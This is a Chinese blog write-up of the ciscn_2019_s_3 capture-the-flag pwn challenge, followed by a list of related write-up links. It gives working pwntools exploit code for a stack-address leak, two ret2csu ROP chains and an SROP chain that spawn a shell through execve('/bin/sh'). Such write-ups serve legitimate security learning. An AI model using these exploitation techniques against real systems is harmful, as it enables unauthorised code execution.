[PWN] ciscn_2019_s_3 ret2csu SROP

于 2023-09-23 17:10:22 发布
阅读量53 收藏
点赞数
分类专栏: 技巧 PWN 栈溢出 文章标签: linux ubuntu 安全 系统安全 python
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_55700752/article/details/133204310
版权
PWN 同时被 3 个专栏收录
13 篇文章 0 订阅
订阅专栏
技巧
8 篇文章 0 订阅
订阅专栏
栈溢出
4 篇文章 0 订阅
订阅专栏

BUUCTF ciscn_2019_s_3

技巧 ret2csu / SROP

checksec:
在这里插入图片描述
IDA:
在这里插入图片描述

ret2csu

利用思路:

总体思路:64位程序利用寄存器传参,可以利用__libc_csu_init函数中的gadgets设置寄存器
细节:可以提前写入/bin/sh\x00设置系统调用号59执行syscall,调用execve("/bin/sh",0,0),

前提:需要的gadget

pop rax(或者 mov rax,59)
syscall
pop rdi (“/bin/sh”)
pop rsi (0)
pop rdx(0)

__libc_csu_init函数可以利用的两个gadget:
pop_rbx_rbp_r12_r13_r14_r15:设置 r13 r14
mov_rdxr13_call:通过r13 r14设置rdx rsi
在这里插入图片描述
可以用来设置execve系统调用号59的gadget:
在这里插入图片描述

泄露栈地址

在这里插入图片描述
vuln函数最后没有没有pop rbp,即不需要填充rbp,直接将rbp覆盖为返回地址即可,缓冲区buf长度为0x10
在这里插入图片描述

payload1 = b"a"*0x10 + p64(main)
sdl(payload1)

在write函数时会打印0x30字节的内容,查看当前buf的内容
在这里插入图片描述
write函数会把栈上的地址打印出来,只需要减去偏移即可得到/bin/sh的栈地址,但是这里有一个问题,
第一次write函数的buf地址和第二次write函数的buf地址不一样(不知道为什么),相差0x20的偏移,因此需要再减去偏移
在这里插入图片描述
实际代码:

dbs("b *0x00400517")
payload1 = b"a"*0x10 + p64(main)
sdl(payload1)
rc(0x20)
sh = u64(rc(8)) - 0x148 -0x20
lg('/bin/sh',sh)

执行syscall调用execve(“/bin/sh”,0,0)

方法一:
main = 0x40051d
vlun=0x0004004ED
execv=0x04004E2
pop_rdi=0x4005a3
pop_rbx_rbp_r12_r13_r14_r15=0x40059A
mov_rdxr13_call=0x0400580 
sys=0x00400517
# dbs("b *0x40059A")
payload1 = b"a"*0x10 + p64(main)
sdl(payload1)
# db()
rc(0x20)
sh = u64(rc(8)) - 0x148 - 0x20
lg('/bin/sh',sh)

payload2 = b"/bin/sh\x00"*2+ p64(pop_rbx_rbp_r12_r13_r14_r15) + p64(0) + p64(1) + p64(sh+0x50) + p64(0)*3
payload2 += p64(mov_rdxr13_call) + p64(execv) + p64(0)*6
payload2 += p64(pop_rdi) + p64(sh) + p64(sys)
sdl(payload2)
it()

p64(pop_rbx_rbp_r12_r13_r14_r15),p64(mov_rdxr13_call):设置rdx,rsi为0
p64(execv) :设置rax系统调用号为59
p64(pop_rdi) + p64(sh): 设置rdi为sh地址
p64(sys):执行syscall
这里需要注意:

p64(0) + p64(1) + p64(sh+0x50) + p64(0)*3

令 rbx=0 rbp=1:避免进入循环
在这里插入图片描述
令 rbx=0 r12=p64(sh+0x50),即call ds:(__frame_dummy_init_array_entry - 600E10h)[r12+rbx*8] = call execv:可以设置rax并retn
在这里插入图片描述
动态调试,执行过程:
首先进入p64(pop_rbx_rbp_r12_r13_r14_r15)设置6个寄存器的值
在这里插入图片描述
返回到p64(mov_rdxr13_call)设置rdx rsi的值
在这里插入图片描述
call [r12+rbx*8] 进入p64(execv)
在这里插入图片描述
在这里插入图片描述

在这里插入图片描述
call结束后返回继续执行,不执行jne
在这里插入图片描述
add rsp,8前:
在这里插入图片描述
add rsp,8后:
在这里插入图片描述
需要pop6个寄存器的值,所以需要payload中 + p64(0)*6
然后执行p64(pop_rdi)
在这里插入图片描述
最后成功执行syscall:
在这里插入图片描述

方法二:

区别在于 p64(execv)卸载binsh后面,在call [r12+rbx*8]时执行即可,同时需要+ p64(0)*7

payload2 = b"/bin/sh\x00"+ p64(execv) + p64(pop_rbx_rbp_r12_r13_r14_r15) + p64(0) + p64(1) + p64(sh+0x8) + p64(0)*3
payload2 += p64(mov_rdxr13_call) + p64(0)*7
payload2 += p64(pop_rdi) + p64(sh) + p64(sys)
sdl(payload2)

SROP

main=0x0004004ED
sigret=0x4004DA
sys=0x400517
context(arch = 'amd64', os = 'linux')

pl1=b'/bin/sh\x00'*2+p64(main)
sd(pl1)
rc(0x20)
sh=u64(rc(8))-0x148
lg('/bin/sh address:',sh)
frame = SigreturnFrame()
frame.rax = constants.SYS_execve
frame.rdi = sh
frame.rsi = 0
frame.rdx = 0
frame.rip = sys

pl1=b'/bin/sh\x00'.ljust(0x10, b'a')+p64(sigret)+p64(sys)+bytes(frame)
sd(pl1)
it()

不知道为什么这里面两次调用write函数时buf的地址就是一样的。。。

看海就会失去海
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 1
    评论
专栏目录
ciscn_2019_n_3
12-30
ciscn(全国大学生信息安全竞赛),2019年的一道题目,涉及到fastbin堆漏洞的利用。由于调用了system函数,所以漏洞利用的难度不大,推荐初学者练习。题解链接:...
your_pwn ciscn 2019 第十二届全国大学生信息安全竞赛
04-22
pwn赛题之your_pwn ciscn 2019 第十二届全国大学生信息安全竞赛
ciscn_2019_s_3
qq_45691294的博客
12-29 2133
首先拿到程序先查看一下程序类型 是一个x86-64的ELF文件,查看一下保护,只开启了堆栈不可执行保护 用IDA分析一下该程序 main函数直接进入到vuln函数,这里利用了系统调用,64位的系统调用的传参方式为 首先将系统调用号 传入 rax,然后将参数 从左到右 依次存入 rdi,rsi,rdx寄存器中,返回值存在rax寄存器 vuln函数执行了read(0,buf,0x400),又执行了write(1,buf,0x30)。看一下buf的位置,发现距离rbp只有0x10大小,存在栈溢出 这里的栈
2019ciscn_s_3
Hyrink的博客
06-07 431
ciscn_s_3的两种解法:SROP & ret2csu详解
ctf【ciscn_2019_s_3】
HUANGliang_的博客
10-29 461
ciscn_2019_s_3
详细ciscn_2019_s_3题解
xieyichensss的博客
04-23 1345
来了来了,我拖了好久,因为吧,之前做了个堆题,大概用了一周才做完,做完堆题,下一个题是栈的,我以为会很简单,但是对我来说很难诶。上才艺… (系统调用其他师傅都有写,我就不赘述啦啦啦啦啦),因为师傅们翻到我这里肯定对系统调用有了解了呀,我这么菜,只能在最下边呜呜呜。 1.拖入ida,反汇编(64位),注意到函数传参与32位会不同。 在函数框内发现vuln(大家应该对这种函数很熟悉了吧),还有gadgets函数,奇怪,正常的栈不会有这种东西啊,于是我就点进去看了看,看到了这两个像rax进行传参的汇编,这就为我们
ciscn_2019_s_3(系统调用综合)
weixin_61283545的博客
06-11 694
打开函数只有read和write。发现gadget函数,这道题重要关键在于系统调用号。发现gadget rax赋值为59,调用execve,ida H键变10进制,调用execve需要$rax==59$rdi==“/bin/sh”$rsi==0$rdx==0syscall这时候就需要用到libc_csu辅助,ropper里面可以找到pop rdi,/bin/sh\x00我们可以直接通过read写入栈中,其他的利用gadget进行填充。 注意的是read后面没有leave不用填充。还有一点在执行csu_e
ciscn-2019-pwn
11-29
1. baby_pwn2. bms3. daily4. Double5 your_pwn
ciscn_2021_silverwolf.zip
05-18
2021第十四届全国大学生信息安全竞赛pwn题。
ciscn_2021_game
06-23
2021年国赛的pwn题,虚拟机类型的题目,分析起来比较有难度。
Ret2csu level5 & ciscn_2019_s_3
红叶的博客
11-06 413
本题难点:对栈的理解需要稍微更深入一点。
【BUUCTF - PWNciscn_2019_s_3
古月浪子的博客
04-17 738
checksec一下,栈溢出 IDA打开看看,main函数内只有一个call vuln 注意到vuln函数末尾并没有使用leave指令,即直接把之前push的rbp当作return address 我们要ROP的话offset只需要0x10 程序里还给了一些gadget,注意到当rax=0x3b时syscall为execve,只需要让rdi="/bin/sh"、rsi=0、rdx=0即可ge...
BUUCTF(pwn) ciscn_2019_s_3 [ 栈溢出SROP攻击]
半岛铁盒的博客
08-10 348
64位,开启了NX保护 main函数调用了vuln
[BUUCTF-pwn]——ciscn_2019_s_3
Y_peak的博客
02-13 344
[BUUCTF-pwn]——ciscn_2019_s_3 题目地址:https://buuoj.cn/challenges#ciscn_2019_s_3 peak 小知识 写这道题之前, 大家首先要了解, 想要获得一个shell, 除了system("/bin/sh") 以外, 还有一种更好的方法, 就是系统调用中的 execve("/bin/sh", NULL, NULL)获得shell。我们可以在 Linxu系统调用号表 中找到对应的系统调用号,进行调用, 其中32位程序系统调用号用 eax 储存
[PWN] BUUCTF ciscn_2019_s_3
空城惜梦的博客
05-31 505
Ciscn_2019_s_3的调试过程步骤payload参考wp 步骤 按照惯例先checksec 用64位ida打开发现main中只要一个关键函数vuln,以及发现有gadgets函数 记录vuln地址:0x4004ED 分析vuln发现进行了系统调用,一个是sys_read,一个是sys_write 调用号:sys_read 的调用号 为 0 ;sys_write 的调用号 为 1; 记录syscall地址:0x400501或0x400517 图中分别给read的三个参数赋值0,&buf,
【BUUCTFPwnCiscn_2019_s_3 | SROP SigreturnFrame函数使用
m0_55368674的博客
02-18 463
【BUUCTFPwnCiscn_2019_s_3 | SROP SigreturnFrame函数使用
[BUUCTF]PWN21——ciscn_2019_s_3
mcmuyanga的博客
09-07 1406
[BUUCTF]PWN21——ciscn_2019_s_3 附件 步骤 例行检查,64位,开启了NX保护 试运行的时候回显是一些乱码,直接用ida打开,从main函数开始看 main函数调用了vuln函数 __asm 关键字用于调用内联汇编程序,并且可在 C 或 C++ 语句合法时出现。 我们首先要了解一下64位系统的系统调用 传参方式:首先将系统调用号 传入 rax,然后将参数 从左到右 依次存入 rdi,rsi,rdx寄存器中,返回值存在rax寄存器 调用号:sys_read 的调用号 为 0 ;
ciscn_2019_s_3(execve&&sigreturn)
qq_33590156的博客
08-04 205
本题是一个系统调用,存在栈溢出,要点有以下几点,以下为第一种解法,构造execve(’/bin/sh’,0,0) 1.题目中,并未出现sub esp得字眼,所以本题中ebp一直与esp重合,即最后ret得时候,pop的其实是rbp处的地址,所以本题返回点并不在ret处,而在rbp处。 2.本题没有‘/bin/sh’,所以只能自己输入到栈上,这时就需要泄漏栈的地址,在使用gdb调试后,可以看到在ret地址后面有存储一个栈地址(即可以泄漏),再在调用syswrite时,可以看到buf的地址,经过计算后,得出偏移
buuctf [HarekazeCTF2019]baby_rop2
最新发布
09-30
[BUUCTF-pwn]——[HarekazeCTF2019]baby_rop2是一个pwn题目。在这个题目中,主要的目标是获取read函数的地址,并利用该地址泄漏libc基址,然后计算system函数和/bin/sh字符串的地址,最终执行system('/bin/sh')获取...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值